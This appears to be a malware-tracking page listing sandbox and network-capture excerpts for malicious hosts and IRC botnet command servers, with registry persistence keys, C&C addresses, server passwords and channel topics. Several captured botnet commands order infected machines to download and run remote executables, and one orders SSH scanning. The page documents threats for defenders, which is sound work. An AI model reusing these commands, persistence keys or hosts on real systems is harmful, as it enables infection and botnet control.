Category: Uncategorized

dq.javagames7.com(malware hosted in United States Dallas Theplanet.com Internet Services Inc)

Uncategorized

DNS Lookup Host Name IP Address dq.javagames7.com 174.121.62.122 Outgoing connection to remote server: dq.javagames7.com TCP port 8800 Outgoing connection to remote server: dq.javagames7.com TCP port 8800 Outgoing connection to remote server: dq.javagames7.com TCP port 8800 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “Taskman” = C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1413syitm.exe HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon “Shell” = explorer.exe,C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1413syitm.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunRead more...

69.162.99.180(malware hosted in United States Dallas Limestone Networks Inc)

Uncategorized

Panel:Outgoing connection to remote server: 69.162.99.180 TCP port 8083 Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Network” = rundll32.exe “C:Dokumente und EinstellungenAdministratorsys32config.dll”,network HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnections “DefaultConnectionSettings” = [REG_BINARY, size: 91 bytes] HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnections “SavedLegacySettings” = [REG_BINARY, size: 91 bytes] HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings “AutoConfigURL” = http://win32.z3nos.com:2011/set.pac Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionFontSubstitutes “MS Shell Dlg 2” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”Read more...

master.easyanticheat.net( malware hosted in Sweden Power Och Random T-lane Ab)

Uncategorized

DNS Lookup Host Name IP Address master.easyanticheat.net 80.67.10.234 Outgoing connection to remote server: master.easyanticheat.net TCP port 50301 Outgoing connection to remote server: 82.203.212.9 TCP port 50301 Outgoing connection to remote server: 78.47.251.150 TCP port 50301 Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced “EnableBalloonTips” = [REG_DWORD, value: 00000001] Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS” HKEY_CURRENT_USERKeyboard LayoutToggleRead more...

zonetf.com(gbot hosted in United States Scranton Network Operations Center Inc)

Uncategorized

DNS Lookup Host Name IP Address iphonefirmware.com 174.121.193.76 127.0.0.1 127.0.0.1 zonetf.com 96.9.169.85 onloneservermonitoring.com 64.191.90.101 www.google.com 209.85.149.106 www.yahoo.com 87.248.122.122 Opened listening TCP connection on port: 55980 Outgoing connection to remote server: iphonefirmware.com TCP port 80 Outgoing connection to remote server: zonetf.com TCP port 80 Outgoing connection to remote server: onloneservermonitoring.com TCP port 80 Outgoing connection toRead more...

sw.maximum-irc.info(botnet hosted in Greece Foundation Of Research And Technology Hellas)

Uncategorized

sw.maximum-irc.info DNS_TYPE_A 147.230.32.174 178.63.131.187 139.91.102.101 147.230.32.174:9595 Nick: {NEW}[AUS][XP]471335 Username: svr-4138 Joined Channel: #swarm# Channel Topic for Channel #swarm#: “.dl http://dl.dropbox.com/u/19204559/ms1.exe sun.exe 1 -s” Private Message to Channel #swarm#: “Executed process “sun.exe”.” Now talking in #swarm# Topic On: [ #swarm# ] [ .update http://dickolsthoorn.nl/dn.exe win.exe 1 ] Topic By: [ me ] Modes On: [ #swarm#Read more...

ssh.bl4ze.info(botnet hosted in Czech Republic Liberec Technical University Of Liberec)

Uncategorized

Botnet C&C irc ssh.bl4ze.info DNS_TYPE_A 93.62.62.208 93.62.62.208:8782 Nick: :{00-AUS-XP-pc1-9923} Username: blaze Server Pass: weed Joined Channel: #sshscan2 Channel Topic for Channel #sshscan2: “.scan sshgodscan 100 5 0 193.x.x.x -b -r -n” Private Message to User {iNF-00-AUT-XP-pxb8x8cI: “SC// Random Port Scan started on 193.x.x.x:22 with a delay of 5 seconds for 0 minutes using 100 threads.”Read more...

91.217.162.108(bfbot hosted in Ukraine Voejkova Nadezhda)

Uncategorized

Remote Host Port Number 112.78.112.208 80 218.85.133.201 80 91.217.162.230 80 91.217.162.80 80 61.158.145.4 7196 PASS laorosr IRCD here 91.217.162.108 1110 PASS eee bfbot here udp protocol MODE [N00_USA_XP_0000146] @ -ix PRIVMSG #dpi :Done.. 00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR 00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341Read more...

173.163.151.27(botnet hosted in United States Mechanicsburg Comcast Business Communications Inc)

Uncategorized

Remote Host Port Number 173.163.151.27 9595 PASS prison NICK {iNF-00-USA-XP-COMP-1754} USER MEAT * 0 :COMP NICK {00-USA-XP-COMP-1754} 173.163.151.27:9595 Nick: :{00-AUT-XP-pc3-3772} Username: MEAT Server Pass: prison Joined Channel: #1 Joined Channel: ###meat Joined Channel: ##http## Joined Channel: ####meat### Channel Topic for Channel ##http##: “.j #1 |j. ###meat |.p ##http##” Channel Topic for Channel ####meat###: “.http http://193.194.67.18/m.exeRead more...